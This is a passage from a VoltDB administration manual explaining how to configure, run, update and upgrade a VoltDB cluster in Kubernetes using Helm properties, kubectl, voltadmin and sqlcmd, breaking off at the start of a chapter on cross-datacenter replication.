properties\nshow in the --set example above:\n$ cat ports.yaml\ncluster:\n serviceSpec:\n clientPort: 22222\n adminPort: 33333\n$ helm install mydb voltdb/voltdb \\\n --values ports.yaml\nYAML files are extremely useful for setting multiple properties with values that do not change fre-\nquently. You can also use them to group properties (such as port settings or security) that work to-\ngether to configure aspects of the database environment.\nYou can use any of the preceding techniques for specifying properties for the VoltDB Helm charts. In fact,\nyou can use each method multiple times on the command line and mixed in any order. For example, the\nfollowing example uses --values to set the database configuration and ports, --set-file to identify\nthe license, and --set to specify the number of nodes requested:\n$ helm install mydb voltdb/voltdb \\\n --values dbconf.xml,dbports.xml \\\n --set-file cluster.config.licenseXMLFile=license.xml \\\n --set cluster.configSpec.replicas=5\n2.2. Configuring the Cluster and Database\nThe two major differences between creating a VoltDB database cluster in Kubernetes and starting a cluster\nusing traditional servers are:\n•With Helm there is a single command (install) that performs both the initialization and the startup of\nthe database.\n•You specify the database configuration with properties rather than as an XML file.\n6Configuring the Volt-\nDB Database Cluster\nIn fact, all of the configuration — including the configuration of the virtual servers (or pods), the server\nprocesses, and the database — is accomplished using Helm properties. The following sections provide\nexamples of some of the most common configuration settings when using Kubernetes. Appendix A, Volt-\nDB Helm Properties gives a full list of all of the properties that are available for customization.\n2.2.1. Configuring the Cluster\nMany of the configuration options that are performed through hardware configuration, system commands\nor environment variables on traditional server platforms are now available through Helm properties. Most\nof these settings are listed in Section A.3, “Kubernetes Cluster Startup Options” .\nHardware Settings\nHardware settings, such as the number of processors and memory size, are defined as Kubernetes\nimage resources through the Helm cluster.clusterSpec.resources property. Under re-\nsources , you can specify any of the YAML properties Kubernetes expects when configuring pods\nwithin a container. For example:\ncluster:\n clusterSpec:\n resources:\n requests:\n cpu: 500m\n memory: 1000Mi\n limits:\n cpu: 500m\n memory: 1000Mi\nSystem Settings\nSystem settings that control process limits that are normally defined through environment variables\ncan be set with the cluster.clusterSpec.env properties. For example, the following YAML\nincreases the Java maximum heap size and disables the collection of JVM statistics:\ncluster:\n clusterSpec:\n env:\n VOLTDB_HEAPMAX: 3072\n VOLTDB_OPTS: -XX+PerfDisableSharedMem\nOne system setting that is not configurable through Kubernetes or Helm is whether the base platform has\nTransparent Huge Pages (THP) enabled or not. This is dependent of the memory management settings on\nthe actual base hardware on which Kubernetes is hosted. Having THP enabled can cause problems with\nmemory-intensive applications like VoltDB and it is strongly recommended that THP be disabled before\nstarting your cluster. (See the section on Transparent Huge Pages in the VoltDB Administrator's Guide for\nan explanation of why this is an issue.)\nIf you are not managing the Kubernetes environment yourself or cannot get your provider to modify their\nenvironment, you will need to override VoltDB's warning about THP on startup by setting the cluster.clus-\nterSpec.additionalArgs property to include the VoltDB start argument to disable the check for THP. For\nexample:\ncluster:\n clusterSpec:\n additionalStartArgs: \n - \"--ignore=thp\"\n7Configuring the Volt-\nDB Database Cluster\n2.2.2. Configuring the Database\nIn addition to configuring the environment VoltDB runs in, there are many different characteristics of\nthe database itself you can control. These include mapping network interfaces and ports, selecting and\nconfiguring database features, and identifying the database schema, class files, and security settings.\nThe network settings are defined through the cluster.serviceSpec properties, where you can\nchoose the individual ports and choose whether to expose them through the networking service ( clus-\nter.serviceSpec.type ) you can also select. For example, the following YAML file disables expo-\nsure of the admin port and assigns the externalized client port to 31313:\ncluster:\n serviceSpec:\n type: NodePort\n adminPortEnabled: false\n clientPortEnabled: true\n clientNodePort: 31313\nThe majority of the database configuration options for VoltDB are traditionally defined in an XML con-\nfiguration file. When using Kubernetes, these options are declared using YAML and Helm properties.\nIn general, the Helm properties follow the same structure as the XML configuration, beginninging with\n\"cluster.config\". So, for example, where the number of sites per host is defined in XML as :\n<deployment>\n <cluster sitesperhost=\"{n}\"/>\n</deployment>\nIt is defined in Kubernetes as:\ncluster:\n config:\n deployment:\n cluster:\n sitesperhost: {n}\nThe following sections give examples of defining common database configurations options using both\nXML and YAML. See Section A.6, “VoltDB Database Configuration Options” for a complete list of the\nHelm properties available for configuring the database.\n2.2.2.1. Command Logging\nCommand logging provides durability of the database content across failures. You can control the level\nof durability as well as the length of time required to recover the database by configuring the type of\ncommand logging and size of the logs themselves. In Kubernetes this is done with the cluster.con-\nfig.deployment.commandlog properties. The following examples show the equivalent configura-\ntion in both XML and YAML:\nXML Configuration File YAML Configuration File\n<commandlog enabled=\"true\"\n synchronous=\"true\"\n logsize=\"3072\">\n <frequency time=\"300\" \n transactions=\"1000\"/>cluster:\n config:\n deployment:\n commandlog:\n enabled: true\n8Configuring the Volt-\nDB Database Cluster\nXML Configuration File YAML Configuration File\n</commandlog> synchronous: true\n logsize: 3072\n frequency:\n transactions 1000\n2.2.2.2. Export\nExport simplifies the integration of the VoltDB database with external databases and systems. You use\nthe export configuration to define external \"targets\" the database can write to. In Kubernetes you define\nexport targets using the cluster.config.deployment.export.configurations property.\nNote that the configurations property can accept multiple configuration definitions. In YAML, you\nspecify a list by prefixing each list element with a hyphen, even if there is only one element. The follow-\ning examples show the equivalent configuration in both XML and YAML for configuring a file export\nconnector:\nXML Configuration File YAML Configuration File\n<export>\n <configuration \n target=\"eventlog\" \n type=\"file\">\n <property \n name=\"type\">csv</property>\n <property \n name=\"nonce\">eventlog</property>\n </configuration>\n</export>cluster:\n config:\n deployment:\n export:\n configurations:\n - target: eventlog\n type: file\n properties:\n type: csv\n nonce: eventlog \n2.2.2.3. Security and User Accounts\nThere are a number of options for securing a VoltDB database, including basic usernames and passwords\nin addition to industry network solutions such as Kerberos and SSL. Basic security is enabled in the con-\nfiguration with the cluster.config.deployment.security.enabled property. You must al-\nso use the property and its children to define the actual usernames, passwords, and assigned roles. Again,\nthe users property expects a list of sub-elements so you must prefix each set of properties with a hyphen.\nFinally, if you do enable basic security, you must also tell the VoltDB operator which account to use\nwhen accessing the database. To do that, you define the cluster.config.auth properties, as shown\nbelow, which must specify an account with the built-in administrator role. The following examples show\nthe equivalent configurations in both XML and YAML, including the assignment of an account to the\nVoltDB Operator:\nXML Configuration File YAML Configuration File\n<security enabled=\"true\"/>\n<users>\n <user name=\"admin\" \n password=\"superman\" \n roles=\"administrator\"/>\n <user name=\"mitty\" \n password=\"thurber\" \n roles=\"user\"/>\n</users>cluster:\n config:\n deployment:\n security:\n enabled: true\n users:\n - name: admin\n password: superman\n roles: administrator\n9Configuring the Volt-\nDB Database Cluster\nXML Configuration File YAML Configuration File\n - name: mitty\n password: thurber\n roles: user\n auth:\n username: admin\n password: superman\n10Chapter 3. Managing VoltDB Databases in\nKubernetes\nWhen running VoltDB in Kubernetes, you are implicitly managing two separate technologies: the database\ncluster — that consists of \"nodes\" and the server processes that run on them — and the collection of\nKubernetes \"pods\" the database cluster runs on. There is a one-to-one relationship between VoltDB nodes\nand Kubernetes pods and it is important that these two technologies stay in sync.\nThe good news is that the VoltDB Operator and Helm manage the orchestration of Kubernetes and the\nVoltDB servers. If a database server goes down, Kubernetes recognizes that the corresponding pod is not\n\"live\" and spins up a replacement. On the other hand, if you intentionally stop the database without telling\nthe Operator or Kubernetes, Kubernetes insists on trying to recreate it.\nTherefore, whereas on traditional servers you use voltadmin and sqlcmd to manage both the cluster and\nthe database content, it is important in a Kubernetes environment that you use the correct utilities for the\nseparate functions:\n•Use kubectl and helm to manage the cluster and the database configuration\n•Use voltadmin and sqlcmd to manage the database contents.\nThe following sections explain how to access and use each of these utilities. Subsequent chapters explain\nhow to perform common cluster and database management functions using these techniques.\n3.1. Managing the Cluster Using the kubctl and\nhelm\nThe key advantage to using Kubernetes is that it automates common administrative tasks, such as making\nsure the cluster keeps running. This is because the VoltDB Operator and Helm charts manage the synchro-\nnization of VoltDB and Kubernetes for you. But it does mean you must use helm or kubectl, and not\nthe equivalent voltadmin commands, to perform operations that affect Kubernetes, such as starting and\nstopping the database, resizing the cluster, changing the configuration, and so on.\nWhen you start the database for the first time, you specify the VoltDB Helm chart and a set of properties\nthat define how the cluster and database are configured. The result is a set of Kubernetes pods and VoltDB\nserver processes known as a Helm \"release\".\nTo manage the cluster and database configuration you use the helm upgrade command to update the\nrelease and change the properties associated with the feature you want to control. For example, to change\nthe frequency of periodic snapshots in the mydb release to 30 minutes, you specify the new value for the\ncluster.config.deployment.snapshot.frequency property, like so:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.config.deployment.snapshot.frequency=30m\nNote\nIt is also possible to use the kubectl patch command to change release properties, specifying\nthe new property value and action to take as a JSON string. However, the examples in this book\n11Managing VoltDB Data-\nbases in Kubernetes\nuse the helm upgrade equivalent wherever possible as the helm command tends to be easier to\nread and remember.\nOne caveat to using the helm upgrade command is that it not only upgrades the release, it checks to see if\nthere is a new version of the original chart (in this example, voltdb/voltdb ) and upgrades that too. Problems\ncould occur if there are changes to the original chart between when you first start the cluster and when\nyou need to stop or resize it.\nThe public charts are not changed very frequently. But if your database is in production for an extended\nperiod of time it could be an issue. Fortunately, there is a solution. To avoid any unexpected changes, you\ncan tell Helm to use a specific version of the chart — the version you started with.\nFirst, use the helm list command to list all of the releases (that is, database instances) you have installed.\nIn the listing it will include both the name and version of the chart in use. For example:\n$ helm list \nNAME NAMESPACE REVISION UPDATED STATUS CHART APP VERSION \nmydb default 1 2020-08-12 12:45:30 deployed voltdb-1.0.0 10.0.0\nYou can then specify the specific chart version when your upgrade the release, thereby avoiding any\nunexpected side effects:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.replicas=7 \\\n --version=1.0.0\n3.2. Managing the Database Using voltadmin and\nsqlcmd\nYou manage the database using the VoltDB command line utilities voltadmin and sqlcmd, the same way\nyou would in a traditional server environment. The one difference is that before you can issue VoltDB\ncommands, you need to decide how to access the database cluster itself. There are two types of access\navailable to you:\n•Interactive access for issuing sqlcmd or voltadmin commands to manage the database\n•Programmatic access, through the client or admin port, for invoking stored procedures\n3.2.1. Accessing the Database Interactively\nKubernetes provides several ways to access the pods running your services. You can run commands on\nindividual pods interactively through the kubectl exec command. You can use the same command to\naccess the command shell for the pod by running bash. Or you can use port forwarding to open ports from\nthe pod to your current environment.\nIn all three cases, you need to know the name of the pod you wish to access. When you start a VoltDB\ncluster with Helm, the pods are created with templated names based on the Helm release name and a\nsequential number. So if you named your three node cluster mydb, the pods would be called mydb-volt-\ndb-cluster-0, mydb-voltdb-cluster-1, and mydb-voltdb-cluster-2. If you are not sure of the names, you can\nuse the kubectl get pods command to see a list:\n$ kubectl get pods\nNAME READY STATUS RESTARTS AGE\n12Managing VoltDB Data-\nbases in Kubernetes\nmydb-voltdb-cluster-0 1/1 Running 0 26m\nmydb-voltdb-cluster-1 1/1 Running 0 26m\nmydb-voltdb-operator-6bbb96b575-8z75x 1/1 Running 0 26m\nHaving chosen a pod to use, running VoltDB commands interactively with kubectl exec is useful for\nissuing individual commands. After the command executes, kubectl returns you to your local shell. For\nexample, you can check the status of the cluster using the voltadmin status command:\n$ kubectl exec -it mydb-voltdb-cluster-0 -- voltadmin status\nCluster 0, version 10.0, hostcount 2, kfactor 0\n 2 live host, 0 missing host, 0 live client, uptime 0 days 00:41:34.293\n-----------------------------------------------\n HostId Host Name\n 0mydb-voltdb-cluster-0\n 1mydb-voltdb-cluster-1\nYou can even use kubectl exec to start an interactive sqlcmd session, which stays active until you exit\nsqlcmd:\n$ kubectl exec -it mydb-voltdb-cluster-0 -- sqlcmd\nSQL Command :: localhost:21212\n1> exit\n$\nOr you can pipe a file of SQL statements to sqlcmd as part of the command:\n$ kubectl exec -it mydb-voltdb-cluster-0 -- sqlcmd < myschema.sql\nHowever, kubectl exec commands execute in the context of the pod. So you cannot do things like load\nJAR files that are in your local directory. If you need to load schema and stored procedures, it is easier to\nuse port forwarding, where ports on the pod are forwarded to the equivalent ports on localhost for your\nlocal machine, so you can run applications and utilities (such as sqlcmd, voltdb, and voltadmin ) locally.\nThe kubectl port-forward command initiates port forwarding, which is active until you stop the command\nprocess. So you need a second process to utilize the linked ports. In the following example the user runs\nthe voter sample application locally on a database in a Kubernetes cluster. To do this, one session enables\nport forwarding on the client and http ports and the second session loads the stored procedures, schema,\nand then runs the client application:\nSession #1\n$ kubectl port-forward mydb-voltdb-cluster-0 21212 8080\nSession #2\n$ cd ~/voltdb/examples/voter\n$ sqlcmd \nSQL Command :: localhost:21212\n1> load classes voter-procs.jar;\n2> file ddl.sql;\n3> exit\n$ ./run.sh client\nPort forwarding is useful for ad hoc activities such as:\n•Loading schema and stored procedures to a running database\n13Managing VoltDB Data-\nbases in Kubernetes\n•Monitoring VoltDB with the web-based VoltDB Management Center (by forwarding port 8080)\n•Quick test runs of client applications\nPort forwarding is not good for running production applications or any ongoing activities, due to its inher-\nent lack of security or robustness as a network solution.\n3.2.2. Accessing the Database Programmatically\nThe approaches for connecting to the database interactively do not work for access by applications, because\ninteractive access focuses on connecting to one node of the database. Applications are encouraged to create\nconnections to all nodes of the database to distribute the workload and avoid bottle necks. In fact, the Java\nclient for VoltDB has special settings to automatically connect to all available nodes (topology awareness)\nand direct partitioned procedures to the appropriate host (client affinity).\nKubernetes provides a number of services to make pods accessible beyond the Kubernetes cluster they run\nin; services such as cluster IPs, node ports, and load balancers. These services usually change the address\nand/or port number seen outside the cluster. And there are still other layers of networking and firewalls\nto traverse before these open ports are accessible outside of Kubernetes itself. This complexity, plus the\nfact that these services result in port numbers and external network addresses that do not match what the\ndatabase itself thinks it is running on, make accessing the database from external applications impractical.\nThe recommended way to access a VoltDB database running in Kubernetes programmatically is to run\nyour application as its own service within the same Kubernetes cluster as the database. This way you can\ntake advantage of the existing VoltDB service names, such as mydb-voltdb-cluster-client , to connect to the\ndatabase. You can then enable topology awareness in the Java cient and let the client make the appropriate\nconnections to the current VoltDB host IPs.\nFor example, if your database Helm release is called mydb and is running in the namespace mydata, the\nJava application code to initiate access to the database might look like the following:\norg.voltdb.client.Client client = null;\nClientConfig config = new ClientConfig(\"\",\"\");\nconfig.setTopologyChangeAware(true);\nclient = ClientFactory.createClient(config);\nclient.createConnection(\"mydb-voltdb-cluster-client.mydata.svc.cluster.local\");\n14Chapter 4. Starng and Stopping the\nDatabase\nThe key to managing VoltDB clusters in Kubernetes is to let the Helm charts do the work for you. You\ncan use helm commands to perform all basic database management activities. This chapter explains how\nto use helm commands to:\n•Start the cluster for the first time\n•Stop and restart the cluster\n•Resize the cluster\n•Pause and resume\nSubsequent chapters explain how to modify the database and cluster configuration of a running database\nas well as upgrade the VoltDB software itself.\n4.1. Starting the Cluster for the First Time\nAs described in Chapter 2, Configuring the VoltDB Database Cluster you can customize every aspect of\nthe database and the cluster using Helm properties and the configuration can be a simple or as complex as\nyou choose. But once you have determined the configuration options you want to use, actually initializing\nand starting the database cluster is a single command, helm install . For example:\n$ helm install mydb voltdb/voltdb \\\n --values myconfig.yaml \\\n --set-file cluster.config.licenseXMLFile=license.xml \\\n --set cluster.clusterSpec.replicas=5\n4.2. Stopping and Restarting the Cluster\nOnce the cluster is running (what Helm calls a \"release\"), you can adjust the cluster to stop it, restart it,\nor resize it, by \"upgrading\" the release chart, specifying the new value for the number of nodes you want.\nYou upgrade the release using much the same command, except rather than repeating the configuration,\nyou can use the --reuse-values flag. So, for example, to stop the cluster, you simply set the number\nof replicas to zero, reusing all other parameters:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.replicas=0\nTo restart the cluster after you stop it, you reset the replica count to five, or whatever you set it to when\nyou initially defined and started it:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.replicas=5\n4.3. Resizing the Cluster with Elastic Scaling\nTo resize the cluster by adding nodes you simply upgrade the release specifying the new number of nodes\nyou want. Of course, the new value must meet the requirements for elastically expanding the cluster, as set\n15Starting and Stopping the Database\nout in the discussion of adding nodes to the cluster in the VoltDB Administrator's Guide . So, for example,\nto increase the cluster size by two nodes, you can set the replica count to seven:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.replicas=7\n4.4. Pausing and Resuming the Cluster\nTo pause the database — that is stop client activity through the client port when performing certain ad-\nministrative functions — you set the property cluster.clusterSpec.maintenanceMode to true. For example,\nthe following commands pause and then resume the database associated with release mydb:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.maintenanceMode=true\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.maintenanceMode=false\n16Chapter 5. Updates and Upgrades\nOnce the database is up and running, Kubernetes works to keep it running in the configuration you speci-\nfied. However, you may need to change that configuration as your database requirements evolve. Changes\nmay be as simple as adding, deleting, or modifying database tables or procedures. Or you may want to\nmodify the configuration of the database, adding new users, or even expanding the cluster by adding nodes.\nThe following sections describe some common update scenarios and how to perform them in a Kubernetes\nenvironment, including:\n•Modifying the database schema\n•Modifying the database or cluster configuration\n•Upgrading the VoltDB software and Helm charts\n5.1. Updating the Database Schema\nOnce the VoltDB database starts, you are ready to manage the database contents. Using Kubernetes does\nnot change how you manage the database content. However, it does require a few extra steps to ensure you\nhave access to the database, as described in Section 3.2.1, “Accessing the Database Interactively” .\nFirst you need to identify the pods using the kubectl get pods command. You can then access the pods,\nindividually, using the kubectl exec command, specifying the pod you want to access and the command\nyou want to run. For example, to run sqlcmd on the first pod, use the following command:\n$ kubectl exec -it mydb-voltdb-cluster-0 -- sqlcmd\nSQL Command :: localhost:21212\n1>\nYou can execute a local batch file of sqlcmd commands remotely by piping the file into the utility. For\nexample:\n$ cat schema.sql\n CREATE TABLE HELLOWORLD ( \n HELLO VARCHAR(15), WORLD VARCHAR(15),\n DIALECT VARCHAR(15) NOT NULL\n );\n PARTITION TABLE HELLOWORLD ON COLUMN DIALECT;\n$ kubectl exec -it mydb-voltdb-cluster-0 -- sqlcmd < schema.sql\nCommand succeeded.\nCommand succeeded.\n$\nChanging the database schema does not require synchronization with Helm or Kubernetes necessarily.\nHowever, if you specified the schema and/or procedure classes when you initially create the Helm release,\nit may be a good idea to keep those properties updated in case you need to re-initialize the database. (for\nexample, when re-establishing a XDCR connection that was broken due to conflicts.) This can be done\nby updating the cluster.config.schemas and/or cluster.config.classes properties. For\nexample:\n$ helm upgrade mydb voltdb/voltdb \\\n17Updates and Upgrades\n --reuse-values \\\n --set-file cluster.config.schemas schema.sql \\\n --set-file cluster.config.classes procs.jar\n5.2. Updating the Database Configuration\nYou can also change the configuration options for the database or the cluster while the database is running.\nIn Kubernetes, you do this by updating the release properties rather than with the voltadmin update\ncommand.\nHow you update the configuration properties is the same for all properties: you use the helm upgrade\ncommand to update the individual properties. However, what actions result from the update depend on the\ntype of properties you want to modify:\n•Dynamic database configuration properties that can be modified \"on the fly\" without restarting the\ndatabase\n•Static database configuration properties that require the database be restarted before they are applied\n•Cluster configuration properties that alter the operation of the cluster and associated Kubernetes pods\nThe following sections describe these three circumstances in detail.\n5.2.1. Changing Database Properties on the Running Data-\nbase\nThere are a number of database configuration options that can be changed while the database is running.\nThose options include:\n•Security settings, including user accounts\ncluster.config.deployment.security.enabled\ncluster.config.deployment.users\n•Import and export settings\ncluster.config.deployment.export.configurations\ncluster.config.deployment.import.configurations\n•Database replication settings (except the DR cluster ID)\ncluster.config.deployment.dr.role\ncluster.config.deployment.dr.connection\n•Automated snapshots\ncluster.config.deployment.snapshot.*\n•System settings:\ncluster.config.deployment.heartbeat.timeout\ncluster.config.deployment.systemsettings.flushinterval.*\ncluster.config.deployment.systemsettings.query.timeout\n18Updates and Upgrades\ncluster.config.deployment.systemsettings.resourcemonitor.*\nFor example, the following helm upgrade command changes the heartbeat timeout to 30 seconds:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.config.deployment.heartbeat.timeout=30\nWhen dynamic configuration properties are modified, the VoltDB Operator updates the running database\nconfiguration as soon as it is notified of the change.\n5.2.2. Changing Database Properties That Require a Restart\nMany database configuration properties are static — they cannot be changed without restarting the data-\nbase. Normally, this requires manually performing a voltadmin shutdown --save , reinitializing and\nrestarting the database cluster, then restoring the final snapshot. For example, command logging cannot\nbe turned on or off while the database is running; similarly, the number of sites per host cannot be altered\non the fly.\nHowever, you can change these properties using the helm upgrade command and the VoltDB Operator\nwill make the changes, but not while the database is running. Instead, the Operator recognizes the changes\nto the configuration, marks the database as requiring a restart, and then schedules a shutdown snapshot,\nreinitialization, and restart of the database for later.\nFor example, you cannot change the number of sites per host while the database is running. But the Operator\ndoes let you change the property in Kubernetes:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.config.deployment.siteperhost=12\nNo action is taken immediately, since the change will require a restart and is likely to interrupt ongoing\ntransactions. Instead, the Operator waits until you are ready to restart the cluster, which you signify by\nchanging another property, cluster.clusterSpec.allowRestartDuringUpdate , to true:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.clusterSpec.allowRestartDuringUpdate=true\nIf you are sure you are ready to restart the cluster when you change the configuration property, you can\nset the two properties at the same time so that the change takes immediate effect:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n --set cluster.config.deployment.siteperhost=12 \\\n --set cluster.clusterSpec.allowRestartDuringUpdate=true\nOnce allowRestartDuringUpdate is set to true, the Operator initiates the restart process, saving,\nshutting down, reinitializing, restarting and restoring the database automatically. Note that once the data-\nbase is restarted, it is a good idea to reset allowRestartDuringUpdate to false to avoid future con-\nfiguration changes triggering immediate restarts:\n$ helm upgrade mydb voltdb/voltdb \\\n --reuse-values \\\n19Updates and Upgrades\n --set cluster.clusterSpec.allowRestartDuringUpdate=false\nWarning\nThere are certain database configuration changes that cannot be made either on the fly or with a\nrestart. In particular, do not attempt to change properties associated with directory paths or SSL\nconfiguration. Changing any of these properties will leave your database in an unstable state.\n5.2.3. Changing Cluster Properties\nThere are properties associated with the environment that the VoltDB database runs on that you can also\nmodify with the helm upgrade command. Most notably, you can increase the size of the cluster, using\nelastic scaling, by changing the cluster.clusterSpec.replicas property, as described in Sec-\ntion 4.3, “Resizing the Cluster with Elastic Scaling” .\nSome properties affect the computing environment, such as environment variables and number of nodes.\nOthers control the network ports assigned or features specific to Kubernetes, such as liveness and readiness.\nAll these properties can be modified. However, they each have separate scopes that affect when the changes\nwill go into affect.\nOf particular note, pod-specific properties will not take affect until each pod restarts. If this is not a\nhigh availability cluster (that is, K=0), the Operator will wait until you to change the property clus-\nter.clusterSpec.allowRestartDuringUpdate to true before restarting the cluster and ap-\nplying the changes. The same applies for any cluster-wide properties.\nHowever, for a K-safe cluster, the Operator can apply pod-specific changes without any downtime by\nperforming a rolling upgrade . That is, stopping and replacing each pod in sequence. So for high availability\nclusters, the Operator will start applying pod-specific changes automatically via a rolling restart regardless\nof the cluster.clusterSpec.allowRestartDuringUpdate setting.\n5.3. Upgrading the VoltDB Software and Helm\nCharts\nWhen new versions of the VoltDB software are released they are accompanied by new versions of the\nHelm charts that support them. By default when you \"install\" a \"release\" of VoltDB with Helm, you get the\nlatest version of the VoltDB software at that time. Your release will stay on its initial version of VoltDB\nas long as you don't update the charts and VoltDB Operator in use.\nYou can upgrade an existing database instance to a recent version using a combination of kubectl and\nhelm commands to update the charts, the operator, and the VoltDB software. The steps to upgrade the\nVoltDB software in Kubernetes are:\n1.Update your copy of the VoltDB repository.\n2.Update the custom resource definition (CRD) for the VoltDB Operator.\n3.Upgrade the VoltDB Operator and software.\nThe following sections explain how to perform each step of this process, including a full example of the\nentire process in Example 5.1, “Process for Upgrading the VoltDB Software” However, when upgrading\nan XDCR cluster, there is an additional step required to ensure the cluster's schema is maintained during the\nupgrade process. Section 5.3.4, “Updating VoltDB for XDCR Clusters” explains the extra step necessary\nfor XDCR clusters.\n20Updates and Upgrades\nNote\nTo use the helm upgrade command to upgrade the VoltDB software, the starting version of\nVoltDB must be 10.1 or higher. See the VoltDB Release Notes for instructions when using Helm\nto upgrade earlier versions of VoltDB.\n5.3.1. Updating Your Helm Repository\nThe first step when upgrading VoltDB is to make sure your local copy of the VoltDB Helm repository is\nup to date. You do this using the helm repo update command:\n$ helm repo update\nOnce you update your local copy of the charts, you can determine which version — of both the charts\nand the software — you want to use by listing all available versions. You do this with the helm search\nrepo command.\n$ helm search repo voltdb/voltdb --versions\nNAME CHART VERSION APP VERSION DESCRIPTION \nvoltdb/voltdb 1.3.0 10.2.0 A Helm chart for VoltDB\nvoltdb/voltdb 1.2.1 10.1.3 A Helm chart for VoltDB\nvoltdb/voltdb 1.2.0 10.1.2 A Helm chart for VoltDB\nvoltdb/voltdb 1.1.0 10.1.0 A Helm chart for VoltDB\nvoltdb/voltdb 1.0.2 10.0.0 A Helm chart for VoltDB\nThe display shows the available versions, including for each release a version number for the chart and\none for the VoltDB software (app version). Make a note of the pair of version numbers who want to use\nbecause you will need them both to complete the following steps of the process. All of the examples in this\ndocument use the chart version 1.2.1 and the software version 10.1.3 for the purposes of demonstration.\n5.3.2. Updating the Custom Resource Definition (CRD)\nThe second step is to update the custom resource definition (CRD) for the VoltDB Operator. This allows\nthe Operator to be upgraded to the latest version.\nTo update the CRD, you must first save a copy of the latest chart, then extract the CRD from the resulting\ntar file. The helm pull command saves the chart as a gzipped tar file and the tar command lets you extract\nthe CRD. For example:\n$ helm pull voltdb/voltdb --version 1.2.1\n$ tar --strip-components=2 -xzf voltdb-1.2.1.tgz \\\n voltdb/crds/voltdb.com_voltdbclusters_crd.yaml\nNote that the file name of the resulting tar file includes the chart version number. Once you have extracted\nthe CRD as a YAML file, you can apply it to Kubernetes:\n$ kubectl apply -f voltdb.com_voltdbclusters_crd.yaml\n5.3.3. Upgrading the VoltDB Operator and Software\nOnce you update the CRD, you are ready to upgrade VoltDB, including both the Operator and the server\nsoftware. You do this using the helm upgrade command and specifying the version numbers for both\nitems on the command line. As soon as you make this change, the Operator will pause the database, take\n21Updates and Upgrades\na final snapshot, shutdown the database and then restart with the new version, restoring the snapshot in\nthe process. For example:\n$ helm upgrade mydb voltdb/voltdb --reuse-values \\\n --set operator.image.tag=1.2.1 \\\n --set cluster.clusterSpec.image.tag=10.1.3\nExample 5.1, “Process for Upgrading the VoltDB Software” summarizes all of the commands needed to\nupdate a database release to VoltDB version 10.1.3.\nExample 5.1. Process for Upgrading the VoltDB Software\n$ # Update the local copy of the charts\n$ helm repo update\n$ helm search repo voltdb/voltdb --versions\nNAME CHART VERSION APP VERSION DESCRIPTION \nvoltdb/voltdb 1.2.1 10.1.3 A Helm chart for VoltDB\nvoltdb/voltdb 1.2.0 10.1.2 A Helm chart for VoltDB\nvoltdb/voltdb 1.1.0 10.1.0 A Helm chart for VoltDB\nvoltdb/voltdb 1.0.2 10.0.0 A Helm chart for VoltDB\n$\n$\n$ # Extract and update the CRD\n$ helm pull voltdb/voltdb --version 1.2.1\n$ tar --strip-components=2 -xzf voltdb-1.2.1.tgz \\\n voltdb/crds/voltdb.com_voltdbclusters_crd.yaml\n$ kubectl apply -f voltdb.com_voltdbclusters_crd.yaml\n$\n$\n$ # Upgrade the Operator and VoltDB software\n$ helm upgrade mydb voltdb/voltdb --reuse-values \\\n --set operator.image.tag=1.2.1 \\\n --set cluster.clusterSpec.image.tag=10.1.3\n5.3.4. Updating VoltDB for XDCR Clusters\nWhen upgrading an XDCR cluster, there is one extra step you must pay attention to. Normally, during the\nupgrade, VoltDB saves and restores a snapshot between versions and so all data and schema information\nis maintained. When upgrading an XDCR cluster, the data and schema is deleted, since the cluster will\nneed to reload the data from another cluster in the XDCR relationship once the upgrade is complete.\nLoading the data is automatic. But loading the schema depends on the schema being stored properly before\nthe upgrade begins.\nIf the schema was loaded through the YAML properties cluster.config.schemas and clus-\nter.config.classes originally and has not changed, the schema and classes will be restored auto-\nmatically. However, if the schema was loaded manually or has been changed since it was originally loaded,\nyou must make sure a current copy of the schema and classes is available after the upgrade. There are\ntwo ways to do this.\nFor both methods, the first step is to save a copy of the schema and the classes. You can do this using the\nvoltdb get schema and voltdb get classes commands. For example, using Kubernetes port forwarding\nyou can save a copy of the schema and class JAR file to your local working directory:\n$ kubectl port-forward mydb-voltdb-cluster-0 21212 &\n22Updates and Upgrades\n$ voltdb get schema -o myschema.sql\n$ voltdb get classes -o myclasses.jar\nOnce you have copies of the current schema and class files, you can either set them as the default schema\nand classes for your database release before you upgrade the software or you can set them in the same\ncommand as you upgrade the software. For example, the following commands set the default schema and\nclasses first, then upgrade the Operator and server software. Alternately, you could put the two --set-\nfile and two --set arguments in a single command.\n$ helm upgrade mydb voltdb/voltdb --reuse-values \\\n --set-file cluster.config.schemas=myschema.sql \\\n --set-file cluster.config.classes=myclasses.jar\n$ helm upgrade mydb voltdb/voltdb --reuse-values \\\n --set operator.image.tag=1.2.1 \\\n --set cluster.clusterSpec.image.tag=10.1.3\n23Chapter 6. Cross Datacenter Replicaon\nin Kubernetes\nPrevious chapters describe how to run a single VoltDB cluster within Kubernetes. Of course, you can run\nmultiple independent VoltDB databases in Kubernetes. You do this by starting each cluster in separate\nregions, under different namespaces within the same Kubernetes cluster, or running a single instance of the\nVoltDB Operator managing multiple clusters in the same namespace. However, some business applications\nrequire the same database running in multiple locations — whether for data redundancy, disaster recovery,\nor geographic distribution. In VoltDB this is done through Cross Datacenter Replication , or XDCR.\nImportant\nPlease note that in addition to the guidance specific to Kubernetes provided in this chapter, the\nfollowing rules apply to XDCR in any operating environment:\n•You must have command logging enabled for three or more clusters.\n•You can only join (or rejoin) one cluster at a time to the XDCR environment.\nCommand logging is always recommended when using XDCR to ensure durability. Using XDCR\nwithout command logging on two clusters, it is possible for transactions processed on one cluster\nto be lost if the cluster crashes before the binary log is sent to the other cluster. However, for three\nor more clusters, command logging is required. Without command logging, not only can XDCR\ntransactions be lost, but it is likely the databases will diverge without warning , if a cluster crashes\nafter sending a binary log to one cooperating cluster but not to the 